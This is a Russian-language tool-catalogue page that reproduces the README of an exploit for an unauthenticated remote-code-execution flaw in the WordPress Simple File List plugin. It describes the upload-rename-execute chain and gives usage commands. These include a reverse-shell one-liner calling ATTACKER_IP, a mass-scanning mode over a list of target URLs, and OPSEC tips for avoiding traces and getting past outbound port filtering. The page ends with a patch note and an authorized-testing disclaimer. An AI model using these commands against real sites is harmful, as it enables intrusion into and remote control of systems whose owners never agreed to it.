Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-34085 — Эксплойт для CVE-2025-34085 | Kitploit
Инструменты/GitHubGitHub/0xgunrunner/cve-2025-34085
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHub0xgunrunner/cve-2025-34085

CVE-2025-34085

Эксплойт для CVE-2025-34085

Репозиторий
147 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-34085 — Неаутентифицированное удаленное выполнение кода в WordPress Simple File List

Автоматизированный эксплойт для CVE-2025-34085 (дубликат CVE-2020-36847), критической уязвимости неаутентифицированного удаленного выполнения кода в плагине WordPress Simple File List версий ≤ 4.2.2.

Примечание: CVE-2025-34085 был отклонен MITRE как дубликат CVE-2020-36847. Уязвимость реальна и исправлена в версии 4.2.3. Оба идентификатора CVE относятся к одной и той же основной проблеме.

Сводка уязвимости

ПолеДетали
CVECVE-2025-34085 / CVE-2020-36847
ПлагинSimple File List
Затронутые версии≤ 4.2.2
Исправленная версия4.2.3
ТипНеограниченная загрузка файлов → Обход переименования → RCE
CVSS9.8 (Критический)
АутентификацияНе требуется
Первоначальное обнаружениеcoiffeur
Модуль Metasploitexploit/multi/http/wp_simple_file_list_rce

Как это работает

  1. Загрузка — PHP-полезная нагрузка загружается, замаскированная под файл .png через конечную точку загрузки плагина (ee-upload-engine.php). Движок загрузки проверяет расширения, но принимает файлы изображений.

  2. Переименование — Функция переименования плагина (ee-file-engine.php) не применяет ограничения на расширения. Атакующий переименовывает .png в .php (или .phtml, .php5, .php3).

  3. Выполнение — Переименованный PHP-файл теперь доступен и исполняем в каталоге загрузок /wp-content/uploads/simple-file-list/, что дает атакующему возможность произвольного выполнения команд.

Требования

pip install requests colorama

Python 3.6+

Использование

Одиночная цель

python3 CVE-2025-34085.py -u http://target.com --cmd "id"

Одиночная цель с встроенной командой (без параметра ?cmd=)

python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline

Массовое сканирование

Создайте файл targets.txt с одним URL на строку:

http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"

Аргументы

АргументОписаниеПо умолчанию
-u, --urlURL одиночной цели—
--cmdКоманда для выполнения на целиid
--inlineВнедрить команду непосредственно в PHP-шелл (жестко запрограммировано, без веб-шелла ?cmd=)False

Совет: Используйте --inline, когда нужен реверсивный шелл или когда цель фильтрует строку запроса. Без --inline эксплойт создает веб-шелл, принимающий команды через ?cmd=.

Вывод

Успешные эксплойты записываются в vuln.txt:

http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)

Заметки по OPSEC для OSCP

  • Эксплойт загружает PHP-файл на диск — это оставит артефакты
  • Веб-шелл сохраняется в /wp-content/uploads/simple-file-list/<random>.php
  • Успешные загрузки записываются локально в vuln.txt — полезно для отчета
  • Для экзамена используйте --inline с реверсивным шеллом, чтобы избежать оставления постоянного веб-шелла с ?cmd=
  • Если цель блокирует исходящие порты, попробуйте обычные разрешенные порты (80, 443, 53)

Ссылки

  • NVD — CVE-2025-34085
  • NVD — CVE-2020-36847
  • Wordfence Advisory
  • Модуль Metasploit
  • Журнал изменений плагина (Патч)
  • Exploit-DB #48979
  • Оригинальный PoC от coiffeur — Exploit-DB #48349

Устранение уязвимости

Обновите плагин Simple File List до версии 4.2.3 или выше.

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Всегда получайте соответствующее разрешение перед тестированием.

Разработчики

  • Первоначальное обнаружение уязвимости: coiffeur
  • Оригинальный скрипт эксплойта: 0xgh057r3c0n, B1ack4sh (Ashwesker)
  • Поддерживается: 0xgunrunner
Скачать инструмент